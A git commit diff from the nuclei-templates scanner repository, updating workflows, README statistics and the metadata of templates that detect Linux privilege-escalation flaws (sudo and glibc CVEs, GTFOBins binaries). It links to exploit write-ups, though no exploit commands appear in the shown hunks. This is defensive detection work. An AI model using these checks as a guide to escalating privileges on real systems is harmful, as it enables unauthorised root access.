Merge branch 'main' into phishing-templates

patch-1
Prince Chaddha 2024-03-08 13:04:54 +05:30 committed by GitHub
commit c287ba0142
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
744 changed files with 14094 additions and 7290 deletions

View File

@ -1,22 +0,0 @@
name: 🗑️ Cache Purge
on:
push:
tags:
- '*'
workflow_dispatch:
jobs:
deploy:
runs-on: ubuntu-latest
if: github.repository == 'projectdiscovery/nuclei-templates'
steps:
# Wait for 5 minutes
- name: Wait for 2 minutes
run: sleep 120
- name: Purge cache
uses: jakejarvis/cloudflare-purge-action@master
env:
CLOUDFLARE_ZONE: ${{ secrets.CLOUDFLARE_ZONE }}
CLOUDFLARE_TOKEN: ${{ secrets.CLOUDFLARE_TOKEN }}

View File

@ -9,6 +9,7 @@ on:
jobs: jobs:
build: build:
runs-on: ubuntu-latest runs-on: ubuntu-latest
if: github.repository == 'projectdiscovery/nuclei-templates'
steps: steps:
- uses: actions/checkout@v4 - uses: actions/checkout@v4
- name: Yamllint - name: Yamllint

View File

@ -11,6 +11,7 @@ on:
jobs: jobs:
build: build:
runs-on: ubuntu-latest runs-on: ubuntu-latest
if: github.repository == 'projectdiscovery/nuclei-templates'
steps: steps:
- uses: actions/checkout@v4 - uses: actions/checkout@v4
with: with:

View File

@ -9,6 +9,7 @@ on:
jobs: jobs:
build: build:
runs-on: ubuntu-latest runs-on: ubuntu-latest
if: github.repository == 'projectdiscovery/nuclei-templates'
steps: steps:
- uses: actions/checkout@v4 - uses: actions/checkout@v4
with: with:

View File

@ -9,6 +9,7 @@ on:
jobs: jobs:
build: build:
runs-on: ubuntu-latest runs-on: ubuntu-latest
if: github.repository == 'projectdiscovery/nuclei-templates'
steps: steps:
- uses: actions/checkout@v4 - uses: actions/checkout@v4
with: with:

View File

@ -3,43 +3,10 @@ on:
push: push:
paths: paths:
- '.new-additions' - '.new-additions'
- 'code/cves/2023/CVE-2023-6246.yaml'
- 'http/cves/2007/CVE-2007-3010.yaml'
- 'http/cves/2011/CVE-2011-4640.yaml'
- 'http/cves/2021/CVE-2021-40651.yaml'
- 'http/cves/2022/CVE-2022-38131.yaml'
- 'http/cves/2023/CVE-2023-28662.yaml'
- 'http/cves/2023/CVE-2023-47115.yaml'
- 'http/cves/2023/CVE-2023-52085.yaml'
- 'http/cves/2023/CVE-2023-6360.yaml'
- 'http/cves/2023/CVE-2023-6909.yaml'
- 'http/cves/2024/CVE-2024-1061.yaml'
- 'http/cves/2024/CVE-2024-21644.yaml'
- 'http/cves/2024/CVE-2024-21645.yaml'
- 'http/cves/2024/CVE-2024-21893.yaml'
- 'http/cves/2024/CVE-2024-22024.yaml'
- 'http/default-logins/webmethod/webmethod-integration-server-default-login.yaml'
- 'http/exposed-panels/apigee-panel.yaml'
- 'http/exposed-panels/dockge-panel.yaml'
- 'http/exposed-panels/easyjob-panel.yaml'
- 'http/exposed-panels/friendica-panel.yaml'
- 'http/exposed-panels/ivanti-connect-secure-panel.yaml'
- 'http/exposed-panels/juniper-panel.yaml'
- 'http/exposed-panels/ms-exchange-web-service.yaml'
- 'http/exposed-panels/pairdrop-panel.yaml'
- 'http/exposed-panels/passbolt-panel.yaml'
- 'http/exposed-panels/sentry-panel.yaml'
- 'http/exposed-panels/vistaweb-panel.yaml'
- 'http/exposures/logs/teampass-ldap.yaml'
- 'http/miscellaneous/balada-injector-malware.yaml'
- 'http/misconfiguration/node-express-dev-env.yaml'
- 'http/misconfiguration/sap/sap-public-admin.yaml'
- 'http/technologies/google/chromecast-detect.yaml'
- 'http/technologies/identity-server-v3-detect.yaml'
- 'http/vulnerabilities/wordpress/wp-user-enum.yaml'
workflow_dispatch: workflow_dispatch:
jobs: jobs:
triggerRemoteWorkflow: triggerRemoteWorkflow:
if: github.repository == 'projectdiscovery/nuclei-templates'
runs-on: ubuntu-latest runs-on: ubuntu-latest
steps: steps:
- name: Trigger Remote Workflow with curl - name: Trigger Remote Workflow with curl

View File

@ -6,6 +6,7 @@ on:
jobs: jobs:
Update: Update:
runs-on: ubuntu-latest runs-on: ubuntu-latest
if: github.repository == 'projectdiscovery/nuclei-templates'
steps: steps:
- name: Check out repository code - name: Check out repository code
uses: actions/checkout@v4 uses: actions/checkout@v4

View File

@ -1,34 +0,0 @@
code/cves/2023/CVE-2023-6246.yaml
http/cves/2007/CVE-2007-3010.yaml
http/cves/2011/CVE-2011-4640.yaml
http/cves/2021/CVE-2021-40651.yaml
http/cves/2022/CVE-2022-38131.yaml
http/cves/2023/CVE-2023-28662.yaml
http/cves/2023/CVE-2023-47115.yaml
http/cves/2023/CVE-2023-52085.yaml
http/cves/2023/CVE-2023-6360.yaml
http/cves/2023/CVE-2023-6909.yaml
http/cves/2024/CVE-2024-1061.yaml
http/cves/2024/CVE-2024-21644.yaml
http/cves/2024/CVE-2024-21645.yaml
http/cves/2024/CVE-2024-21893.yaml
http/cves/2024/CVE-2024-22024.yaml
http/default-logins/webmethod/webmethod-integration-server-default-login.yaml
http/exposed-panels/apigee-panel.yaml
http/exposed-panels/dockge-panel.yaml
http/exposed-panels/easyjob-panel.yaml
http/exposed-panels/friendica-panel.yaml
http/exposed-panels/ivanti-connect-secure-panel.yaml
http/exposed-panels/juniper-panel.yaml
http/exposed-panels/ms-exchange-web-service.yaml
http/exposed-panels/pairdrop-panel.yaml
http/exposed-panels/passbolt-panel.yaml
http/exposed-panels/sentry-panel.yaml
http/exposed-panels/vistaweb-panel.yaml
http/exposures/logs/teampass-ldap.yaml
http/miscellaneous/balada-injector-malware.yaml
http/misconfiguration/node-express-dev-env.yaml
http/misconfiguration/sap/sap-public-admin.yaml
http/technologies/google/chromecast-detect.yaml
http/technologies/identity-server-v3-detect.yaml
http/vulnerabilities/wordpress/wp-user-enum.yaml

View File

@ -18,7 +18,6 @@ tags:
- "local" - "local"
- "brute-force" - "brute-force"
- "bruteforce" - "bruteforce"
- "privesc"
- "phishing" - "phishing"
# The following templates have been excluded because they have weak matchers and may generate FP results. # The following templates have been excluded because they have weak matchers and may generate FP results.

View File

@ -42,18 +42,18 @@ An overview of the nuclei template project, including statistics on unique tags,
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|-----------|-------|--------------|-------|------------|-------|----------|-------|------|-------| |-----------|-------|--------------|-------|------------|-------|----------|-------|------|-------|
| cve | 2343 | dhiyaneshdk | 1137 | http | 6975 | info | 3357 | file | 312 | | cve | 2386 | dhiyaneshdk | 1189 | http | 7104 | info | 3421 | file | 312 |
| panel | 1054 | daffainfo | 863 | file | 312 | high | 1550 | dns | 21 | | panel | 1085 | daffainfo | 864 | file | 312 | high | 1583 | dns | 21 |
| wordpress | 941 | dwisiswant0 | 801 | workflows | 191 | medium | 1450 | | | | wordpress | 953 | dwisiswant0 | 802 | workflows | 191 | medium | 1463 | | |
| xss | 887 | pikpikcu | 353 | network | 132 | critical | 943 | | | | exposure | 892 | pikpikcu | 353 | network | 132 | critical | 959 | | |
| exposure | 860 | pussycat0x | 313 | code | 79 | low | 255 | | | | xss | 892 | pussycat0x | 313 | code | 80 | low | 258 | | |
| wp-plugin | 816 | ritikchaddha | 300 | ssl | 27 | unknown | 34 | | | | wp-plugin | 828 | ritikchaddha | 308 | ssl | 27 | unknown | 35 | | |
| osint | 678 | pdteam | 285 | javascript | 26 | | | | | | osint | 678 | pdteam | 285 | javascript | 26 | | | | |
| tech | 653 | ricardomaia | 231 | dns | 18 | | | | | | tech | 659 | ricardomaia | 231 | dns | 18 | | | | |
| lfi | 628 | geeknik | 225 | headless | 11 | | | | | | lfi | 634 | geeknik | 227 | headless | 11 | | | | |
| edb | 598 | theamanrawat | 221 | cloud | 9 | | | | | | edb | 598 | theamanrawat | 221 | cloud | 9 | | | | |
**552 directories, 8061 files**. **569 directories, 8193 files**.
</td> </td>
</tr> </tr>

File diff suppressed because one or more lines are too long

File diff suppressed because it is too large Load Diff

View File

@ -1,12 +1,12 @@
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|-----------|-------|--------------|-------|------------|-------|----------|-------|------|-------| |-----------|-------|--------------|-------|------------|-------|----------|-------|------|-------|
| cve | 2343 | dhiyaneshdk | 1137 | http | 6975 | info | 3357 | file | 312 | | cve | 2386 | dhiyaneshdk | 1189 | http | 7104 | info | 3421 | file | 312 |
| panel | 1054 | daffainfo | 863 | file | 312 | high | 1550 | dns | 21 | | panel | 1085 | daffainfo | 864 | file | 312 | high | 1583 | dns | 21 |
| wordpress | 941 | dwisiswant0 | 801 | workflows | 191 | medium | 1450 | | | | wordpress | 953 | dwisiswant0 | 802 | workflows | 191 | medium | 1463 | | |
| xss | 887 | pikpikcu | 353 | network | 132 | critical | 943 | | | | exposure | 892 | pikpikcu | 353 | network | 132 | critical | 959 | | |
| exposure | 860 | pussycat0x | 313 | code | 79 | low | 255 | | | | xss | 892 | pussycat0x | 313 | code | 80 | low | 258 | | |
| wp-plugin | 816 | ritikchaddha | 300 | ssl | 27 | unknown | 34 | | | | wp-plugin | 828 | ritikchaddha | 308 | ssl | 27 | unknown | 35 | | |
| osint | 678 | pdteam | 285 | javascript | 26 | | | | | | osint | 678 | pdteam | 285 | javascript | 26 | | | | |
| tech | 653 | ricardomaia | 231 | dns | 18 | | | | | | tech | 659 | ricardomaia | 231 | dns | 18 | | | | |
| lfi | 628 | geeknik | 225 | headless | 11 | | | | | | lfi | 634 | geeknik | 227 | headless | 11 | | | | |
| edb | 598 | theamanrawat | 221 | cloud | 9 | | | | | | edb | 598 | theamanrawat | 221 | cloud | 9 | | | | |

View File

@ -9,7 +9,7 @@ info:
metadata: metadata:
verified: true verified: true
max-request: 1 max-request: 1
tags: cloud,cloud-enum,azure,brute-force,enum tags: cloud,cloud-enum,azure,bruteforce,enum
self-contained: true self-contained: true
@ -63,4 +63,4 @@ dns:
part: answer part: answer
words: words:
- "IN\tA" - "IN\tA"
# digest: 4a0a0047304502210099044650fcae81add403703f5262b5673a46eca139d542c751548b0f7aadcc9c022038fa381a6c09a5a8341ac70d7a4ed8339a48c947bbdd3f5bd22e5a336daf9cec:922c64590222798bb761d5b6d8e72950 # digest: 4a0a00473045022100ad529d9d011c813ce7e0cb419a8440ca3f0bef3ca063b85560dbc678d6eb7056022022aa46f55179a7b72c6a02dcda0444e0aba98ddaa781c8118d39acd5cafdeaaf:922c64590222798bb761d5b6d8e72950

View File

@ -9,11 +9,22 @@ info:
reference: reference:
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14287 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14287
- https://www.exploit-db.com/exploits/47502 - https://www.exploit-db.com/exploits/47502
- http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00042.html
- http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00047.html
- http://packetstormsecurity.com/files/154853/Slackware-Security-Advisory-sudo-Updates.html
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.8
cve-id: CVE-2019-14287
cwe-id: CWE-755
epss-score: 0.34299
epss-percentile: 0.96958
cpe: cpe:2.3:a:sudo_project:sudo:*:*:*:*:*:*:*:*
metadata: metadata:
verified: true verified: true
max-request: 2 max-request: 2
vendor: canonical vendor: sudo_project
product: ubuntu_linux product: sudo
tags: cve,cve2019,sudo,code,linux,privesc,local,canonical tags: cve,cve2019,sudo,code,linux,privesc,local,canonical
self-contained: true self-contained: true
@ -36,4 +47,4 @@ code:
- '!contains(code_1_response, "root")' - '!contains(code_1_response, "root")'
- 'contains(code_2_response, "root")' - 'contains(code_2_response, "root")'
condition: and condition: and
# digest: 4b0a00483046022100f4f8e722b5f42a0123c6f1f8f54ac645f9d05fcd3cfef40c38b610291978a5e00221009d44ff15e4eea65e3fcb18aeece52355879b009f9a7246c145abdaf23807e2ea:922c64590222798bb761d5b6d8e72950 # digest: 490a0046304402205d953c6f0c1352f39f1035d518dc38cffe2165dfb1f4ddd270434e7dbb790c1102200423935d03c0eafff4702b083c0d5da821affb591901209cd6d087644114abdf:922c64590222798bb761d5b6d8e72950

View File

@ -10,8 +10,20 @@ info:
- https://medium.com/mii-cybersec/privilege-escalation-cve-2021-3156-new-sudo-vulnerability-4f9e84a9f435 - https://medium.com/mii-cybersec/privilege-escalation-cve-2021-3156-new-sudo-vulnerability-4f9e84a9f435
- https://blog.qualys.com/vulnerabilities-threat-research/2021/01/26/cve-2021-3156-heap-based-buffer-overflow-in-sudo-baron-samedit - https://blog.qualys.com/vulnerabilities-threat-research/2021/01/26/cve-2021-3156-heap-based-buffer-overflow-in-sudo-baron-samedit
- https://infosecwriteups.com/baron-samedit-cve-2021-3156-tryhackme-76d7dedc3cff - https://infosecwriteups.com/baron-samedit-cve-2021-3156-tryhackme-76d7dedc3cff
- http://packetstormsecurity.com/files/161160/Sudo-Heap-Based-Buffer-Overflow.html
- http://packetstormsecurity.com/files/176932/glibc-syslog-Heap-Based-Buffer-Overflow.html
classification:
cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score: 7.8
cve-id: CVE-2021-3156
cwe-id: CWE-193
epss-score: 0.97085
epss-percentile: 0.99752
cpe: cpe:2.3:a:sudo_project:sudo:*:*:*:*:*:*:*:*
metadata: metadata:
verified: true verified: true
vendor: sudo_project
product: sudo
tags: cve,cve2021,sudo,code,linux,privesc,local,kev tags: cve,cve2021,sudo,code,linux,privesc,local,kev
self-contained: true self-contained: true
@ -28,4 +40,4 @@ code:
- "malloc(): memory corruption" - "malloc(): memory corruption"
- "Aborted (core dumped)" - "Aborted (core dumped)"
condition: and condition: and
# digest: 490a00463044022074b8ca1a10aca438432f3b6e55023b9c80357eb5a6f2ac795774b7d44e85188e02201a3af75f86a975548121afe1ab1faf6ade2d1e89d05200b4e6990e97af56af36:922c64590222798bb761d5b6d8e72950 # digest: 490a004630440220494a1c88897c9697f8d55a15b5ba0990a64225974efa03ca485ae5ebe4c2bcf0022019eb5fcd9dd61429f3964b64b263aec23e0193b30d695284d275818b9c38812d:922c64590222798bb761d5b6d8e72950

View File

@ -21,8 +21,8 @@ info:
cvss-score: 7.8 cvss-score: 7.8
cve-id: CVE-2023-2640 cve-id: CVE-2023-2640
cwe-id: CWE-863 cwe-id: CWE-863
epss-score: 0.00047 epss-score: 0.00174
epss-percentile: 0.14754 epss-percentile: 0.53697
cpe: cpe:2.3:o:canonical:ubuntu_linux:23.04:*:*:*:*:*:*:* cpe: cpe:2.3:o:canonical:ubuntu_linux:23.04:*:*:*:*:*:*:*
metadata: metadata:
verified: true verified: true
@ -54,4 +54,4 @@ code:
- '!contains(code_1_response, "(root)")' - '!contains(code_1_response, "(root)")'
- 'contains(code_2_response, "(root)")' - 'contains(code_2_response, "(root)")'
condition: and condition: and
# digest: 4a0a00473045022100a20c4d30517d6bd96f1a97d3fca9e29bd1f686eeb9192a3f503a5bddffeda9fe022020188e4f25e79706197eab61598d64679c02828a0aedf7f496b5fbe14707ec90:922c64590222798bb761d5b6d8e72950 # digest: 4a0a00473045022100b7d65ed4d77da164c62392e9367361cd521cd12c1746e27d4865c7913b4250910220243bd991082f86b48587a9ec336c51a545db1464e12ebbbfc0ee5128bc2cb27f:922c64590222798bb761d5b6d8e72950

View File

@ -10,16 +10,21 @@ info:
- https://nvd.nist.gov/vuln/detail/CVE-2023-4911 - https://nvd.nist.gov/vuln/detail/CVE-2023-4911
- https://www.qualys.com/2023/10/03/cve-2023-4911/looney-tunables-local-privilege-escalation-glibc-ld-so.txt - https://www.qualys.com/2023/10/03/cve-2023-4911/looney-tunables-local-privilege-escalation-glibc-ld-so.txt
- https://www.youtube.com/watch?v=1iV-CD9Apn8 - https://www.youtube.com/watch?v=1iV-CD9Apn8
- http://www.openwall.com/lists/oss-security/2023/10/05/1
- http://www.openwall.com/lists/oss-security/2023/10/13/11
classification: classification:
cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score: 7.8 cvss-score: 7.8
cve-id: CVE-2023-4911 cve-id: CVE-2023-4911
cwe-id: CWE-787 cwe-id: CWE-787,CWE-122
cpe: cpe:2.3:a:gnu:glibc:-:*:*:*:*:*:*:* epss-score: 0.0171
epss-percentile: 0.87439
cpe: cpe:2.3:a:gnu:glibc:*:*:*:*:*:*:*:*
metadata: metadata:
max-request: 1 max-request: 1
vendor: glibc vendor: gnu
tags: cve,cve2023,code,glibc,looneytunables,linux,privesc,local product: glibc
tags: cve,cve2023,code,glibc,looneytunables,linux,privesc,local,kev
self-contained: true self-contained: true
code: code:
@ -34,4 +39,4 @@ code:
- type: word - type: word
words: words:
- "139" # Segmentation Fault Exit Code - "139" # Segmentation Fault Exit Code
# digest: 4a0a004730450220420ab1d35c89225b917a344669e743fa83b79698910c4f87a5124f2dfaae54cd022100d122ece9eaba7f9bfc32d229e79d56b127da02ce4e5cf4034ecebfd9da56a9a2:922c64590222798bb761d5b6d8e72950 # digest: 4a0a00473045022100f0ab74cd6ae5323c4a571e6c858cbbb8ced3b3b2b8dbb8d8c65b380a03a28f8302203aced1de4878bced98bb7d6bd296b9187a2d4795325e1f62debb338f363295f5:922c64590222798bb761d5b6d8e72950

View File

@ -9,15 +9,21 @@ info:
reference: reference:
- https://nvd.nist.gov/vuln/detail/CVE-2023-6246 - https://nvd.nist.gov/vuln/detail/CVE-2023-6246
- https://www.qualys.com/2024/01/30/cve-2023-6246/syslog.txt - https://www.qualys.com/2024/01/30/cve-2023-6246/syslog.txt
- https://access.redhat.com/security/cve/CVE-2023-6246
- https://bugzilla.redhat.com/show_bug.cgi?id=2249053
- https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/D2FIH77VHY3KCRROCXOT6L27WMZXSJ2G/
classification: classification:
cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score: 7.8 cvss-score: 7.8
cve-id: CVE-2023-6246 cve-id: CVE-2023-6246
cwe-id: CWE-787 cwe-id: CWE-787,CWE-122
epss-score: 0.00383
epss-percentile: 0.72435
cpe: cpe:2.3:a:gnu:glibc:*:*:*:*:*:*:*:* cpe: cpe:2.3:a:gnu:glibc:*:*:*:*:*:*:*:*
metadata: metadata:
max-request: 1 max-request: 1
vendor: glibc vendor: gnu
product: glibc
tags: cve,cve2023,code,glibc,linux,privesc,local tags: cve,cve2023,code,glibc,linux,privesc,local
self-contained: true self-contained: true
@ -33,4 +39,4 @@ code:
- type: word - type: word
words: words:
- "127" # Segmentation Fault Exit Code - "127" # Segmentation Fault Exit Code
# digest: 4a0a00473045022100fec914f6ee85b53ab611e26476cba7da42e11cdcb33c935a2d003c74c7312b1302207b65c84f8435932f1aa050019f6aaf899442187cf9630df934cf9086bd94a2f6:922c64590222798bb761d5b6d8e72950 # digest: 4a0a00473045022100816db78414b7bafd0437ce9725201733ffd4c96f285f1cdbe48e08e348e67372022040042ed5d64ab0b2bc48789dd519af760226f155f1764ee76b460937ee89a839:922c64590222798bb761d5b6d8e72950

View File

@ -9,8 +9,8 @@ info:
reference: reference:
- https://gtfobins.github.io/gtfobins/choom/ - https://gtfobins.github.io/gtfobins/choom/
metadata: metadata:
max-request: 3
verified: true verified: true
max-request: 3
tags: code,linux,choom,privesc,local tags: code,linux,choom,privesc,local
self-contained: true self-contained: true
@ -46,4 +46,4 @@ code:
- 'contains(code_2_response, "root")' - 'contains(code_2_response, "root")'
- 'contains(code_3_response, "root")' - 'contains(code_3_response, "root")'
condition: or condition: or
# digest: 4a0a0047304502203b1238ca7d9be64f51e9162022deaf76b02898053cbb3511377e76228d3d79ef0221008b6aa349a17b0a16a0d0949f1797c8e111d2498185b88fe99c326c60c59167c9:922c64590222798bb761d5b6d8e72950 # digest: 4a0a00473045022100cd0a7dc9b51ef8f3f850d3fde75e025e13c61b464ac044825ac70107c66db1de0220290c09bd78a4e25f5cabc659f9441a3c168a1ca2c226f0ddf9316de01eb30461:922c64590222798bb761d5b6d8e72950

View File

@ -9,8 +9,8 @@ info:
reference: reference:
- https://gtfobins.github.io/gtfobins/find/ - https://gtfobins.github.io/gtfobins/find/
metadata: metadata:
max-request: 3
verified: true verified: true
max-request: 3
tags: code,linux,find,privesc,local tags: code,linux,find,privesc,local
self-contained: true self-contained: true
@ -46,4 +46,4 @@ code:
- 'contains(code_2_response, "root")' - 'contains(code_2_response, "root")'
- 'contains(code_3_response, "root")' - 'contains(code_3_response, "root")'
condition: or condition: or
# digest: 4b0a0048304602210093227e768a659e1747e4dd5d82e25ade3f152549f159b967327082c90677fc5e022100ba7d7a12344d88ac9ec3c0832b25af9d1ef25fe4470e6963b2f3ae814c844e89:922c64590222798bb761d5b6d8e72950 # digest: 490a0046304402207f55b1ac220ad114cf5cd2341a388a3860f134489b662ff708d8553b7156207a02201bddad6e9a46aa5b077f01de8b269b2797007741d8c6f38b9ddc7724462497e5:922c64590222798bb761d5b6d8e72950

View File

@ -9,8 +9,8 @@ info:
reference: reference:
- https://gtfobins.github.io/gtfobins/lua/ - https://gtfobins.github.io/gtfobins/lua/
metadata: metadata:
max-request: 3
verified: true verified: true
max-request: 3
tags: code,linux,lua,privesc,local tags: code,linux,lua,privesc,local
self-contained: true self-contained: true
@ -46,4 +46,4 @@ code:
- 'contains(code_2_response, "root")' - 'contains(code_2_response, "root")'
- 'contains(code_3_response, "root")' - 'contains(code_3_response, "root")'
condition: or condition: or
# digest: 4a0a00473045022033fd3387c3085b4f8e3a7ced68a4e324ba82f7e683a8c29e5ab32c1975a8fe4b02210097eb732caf95609123a361436265388bba8c2c95fcba6ddaf6504d3a5b19c19f:922c64590222798bb761d5b6d8e72950 # digest: 4a0a0047304502202ed356f302529ce69de66a24987b78693c5d679a4340425ad29a76fa63db81ab022100a1157d5ab30c98ef4366d8cba600703686a43211b15ce7d17e4fc07a79db5a8f:922c64590222798bb761d5b6d8e72950

View File

@ -9,8 +9,8 @@ info:
reference: reference:
- https://gtfobins.github.io/gtfobins/mysql/ - https://gtfobins.github.io/gtfobins/mysql/
metadata: metadata:
max-request: 3
verified: true verified: true
max-request: 3
tags: code,linux,mysql,privesc,local tags: code,linux,mysql,privesc,local
self-contained: true self-contained: true
@ -46,4 +46,4 @@ code:
- 'contains(code_2_response, "root")' - 'contains(code_2_response, "root")'
- 'contains(code_3_response, "root")' - 'contains(code_3_response, "root")'
condition: or condition: or
# digest: 4b0a00483046022100fa6772f8e48a5c9ac87ddba3ecc262a59d16d9cba527623da8f5cdf9509e44880221008cff1c5a77c27a1f59d943884498c8d1499da98e6ecf7e1d63851de4ae9fa76c:922c64590222798bb761d5b6d8e72950 # digest: 4a0a0047304502205cfddd58041ea672c83a850b34e77b9b635e71f934118d2a1ab9ab3ca660e13b022100eec2e1232af1d0b4686fc284278197db41fa3a289488abb2936a1186b85e3e26:922c64590222798bb761d5b6d8e72950

View File

@ -9,8 +9,8 @@ info:
reference: reference:
- https://gtfobins.github.io/gtfobins/node/ - https://gtfobins.github.io/gtfobins/node/
metadata: metadata:
max-request: 4
verified: true verified: true
max-request: 4
tags: code,linux,node,privesc,local tags: code,linux,node,privesc,local
self-contained: true self-contained: true
@ -53,4 +53,4 @@ code:
- 'contains(code_3_response, "root")' - 'contains(code_3_response, "root")'
- 'contains(code_4_response, "root")' - 'contains(code_4_response, "root")'
condition: or condition: or
# digest: 4b0a00483046022100e32f25ba4a83d9d265aa187532f0090ba2fdf1beb89235113b4caeed36413ac30221008ecd529618da3ad2ed65e939b4233529614a005b87fd760bbeeb95de2e78746f:922c64590222798bb761d5b6d8e72950 # digest: 4b0a00483046022100c2fb7e0f1c8874aa30b7cbf614269bbd607e7679a738d4e4b6e6d5cafdf8faa1022100af88ace2a97d251334aeefafdfbd07471443304b4505d49f1edf432f53b5e43a:922c64590222798bb761d5b6d8e72950

View File

@ -9,8 +9,8 @@ info:
reference: reference:
- https://gtfobins.github.io/gtfobins/rc/ - https://gtfobins.github.io/gtfobins/rc/
metadata: metadata:
max-request: 3
verified: true verified: true
max-request: 3
tags: code,linux,rc,privesc,local tags: code,linux,rc,privesc,local
self-contained: true self-contained: true
@ -46,4 +46,4 @@ code:
- 'contains(code_2_response, "root")' - 'contains(code_2_response, "root")'
- 'contains(code_3_response, "root")' - 'contains(code_3_response, "root")'
condition: or condition: or
# digest: 4a0a004730450220665e08a8d241b76abc6c9f908b6c953eeebccc153af1c165958c388f1a57c3eb02210091d8e2364f4c48b2fd9d8b64222760ce398677386e5d185fc86425ea5ed10527:922c64590222798bb761d5b6d8e72950 # digest: 4a0a0047304502202a315bdc26f4d35efa4a6f698d5324b05e6f7d849772f27996dd0e04ac0edd5b022100cb3566b03c81b4ced70cb1bf221db42da3f9262c3ce4790664bc215a0b623abf:922c64590222798bb761d5b6d8e72950

View File

@ -8,8 +8,8 @@ info:
The run-parts command in Linux is used to run all the executable files in a directory. It is commonly used for running scripts or commands located in a specific directory, such as system maintenance scripts in /etc/cron.daily. The run-parts command provides a convenient way to execute multiple scripts or commands in a batch manner. The run-parts command in Linux is used to run all the executable files in a directory. It is commonly used for running scripts or commands located in a specific directory, such as system maintenance scripts in /etc/cron.daily. The run-parts command provides a convenient way to execute multiple scripts or commands in a batch manner.
reference: https://gtfobins.github.io/gtfobins/run-parts/ reference: https://gtfobins.github.io/gtfobins/run-parts/
metadata: metadata:
max-request: 3
verified: true verified: true
max-request: 3
tags: code,linux,run-parts,privesc,local tags: code,linux,run-parts,privesc,local
self-contained: true self-contained: true
@ -45,4 +45,4 @@ code:
- 'contains(code_2_response, "root")' - 'contains(code_2_response, "root")'
- 'contains(code_3_response, "root")' - 'contains(code_3_response, "root")'
condition: or condition: or
# digest: 490a00463044022055bdbe38258f303b3247dcaaec655d2aca77ff0d5e3d83a8e763840384618a7c02204591a5abce03bc68b647b84a4a4fd59da6d3713256d3494aadc43cf2076778dd:922c64590222798bb761d5b6d8e72950 # digest: 490a00463044022058411677d700beae571edc83b5da8ff31eaa193dac73ba1515a220842ccabc8d0220151cca60c8ad28b2934984be7d6a187d3dd02ee9cac9a5cc3cd0af97273c6bca:922c64590222798bb761d5b6d8e72950

View File

@ -9,8 +9,8 @@ info:
reference: reference:
- https://gtfobins.github.io/gtfobins/strace/ - https://gtfobins.github.io/gtfobins/strace/
metadata: metadata:
max-request: 3
verified: true verified: true
max-request: 3
tags: code,linux,strace,privesc,local tags: code,linux,strace,privesc,local
self-contained: true self-contained: true
@ -46,4 +46,4 @@ code:
- 'contains(code_2_response, "root")' - 'contains(code_2_response, "root")'
- 'contains(code_3_response, "root")' - 'contains(code_3_response, "root")'
condition: or condition: or
# digest: 4a0a004730450221008a56962d3e0bfec8153fae52f4693ee5b8065098d3b7c5e16b5c2f481dcaaeb8022077e7fc1be8079fde76cbf09b10718038a4e013725c9955a91d5b024d02bdd27f:922c64590222798bb761d5b6d8e72950 # digest: 4a0a0047304502202b121064fdd29dfb40970b3956fcfb830cc7150f895b56913870f21c1f2f5e85022100fd214757ef5ac44a07cfc6fcdcf6da1fe59cd2b44f98829f01fc6af0c58045d8:922c64590222798bb761d5b6d8e72950

View File

@ -9,8 +9,8 @@ info:
reference: reference:
- https://gtfobins.github.io/gtfobins/torify/ - https://gtfobins.github.io/gtfobins/torify/
metadata: metadata:
max-request: 3
verified: true verified: true
max-request: 3
tags: code,linux,torify,privesc,local tags: code,linux,torify,privesc,local
self-contained: true self-contained: true
@ -46,4 +46,4 @@ code:
- 'contains(code_2_response, "root")' - 'contains(code_2_response, "root")'
- 'contains(code_3_response, "root")' - 'contains(code_3_response, "root")'
condition: or condition: or
# digest: 4a0a00473045022100fe967badaa42178c43d6c5f965ebd2205cd5636ddceeece364aedd793b317d1902207ad0bc797b16421928d1ec9016ba53809758b9f7603effab908a27decbc3cc74:922c64590222798bb761d5b6d8e72950 # digest: 4b0a004830460221008ca7aa24f7f8fa13b8d43c96981d8fd78a382752f6e2c69dfab164443972b747022100d307d8b9c2054d4731db696fc13198afed46d5b1215a6899b56533661240fc91:922c64590222798bb761d5b6d8e72950

View File

@ -9,8 +9,8 @@ info:
reference: reference:
- https://gtfobins.github.io/gtfobins/view/ - https://gtfobins.github.io/gtfobins/view/
metadata: metadata:
max-request: 3
verified: true verified: true
max-request: 3
tags: code,linux,view,privesc,local tags: code,linux,view,privesc,local
self-contained: true self-contained: true
@ -46,4 +46,4 @@ code:
- 'contains(code_2_response, "root")' - 'contains(code_2_response, "root")'
- 'contains(code_3_response, "root")' - 'contains(code_3_response, "root")'
condition: or condition: or
# digest: 490a0046304402207dc9a1ca06fcde2705d1a72ee2f792eff2f81f5d00def77fa54eec5d7717c19e02200c984a4f0d0cf94baa16c355ab52265f3dd281cac5bdd92f8ef9242efc087166:922c64590222798bb761d5b6d8e72950 # digest: 4a0a00473045022100ed64ed48009962a92006b2ce803d0c5189e91ced727a841bc8c31e5d98d1a9b5022009f19b7df531fecde9b1303555d1ec29ba63a49ca1c439b6f48f46552d2d4bb4:922c64590222798bb761d5b6d8e72950

View File

@ -9,8 +9,8 @@ info:
reference: reference:
- https://gtfobins.github.io/gtfobins/xargs/ - https://gtfobins.github.io/gtfobins/xargs/
metadata: metadata:
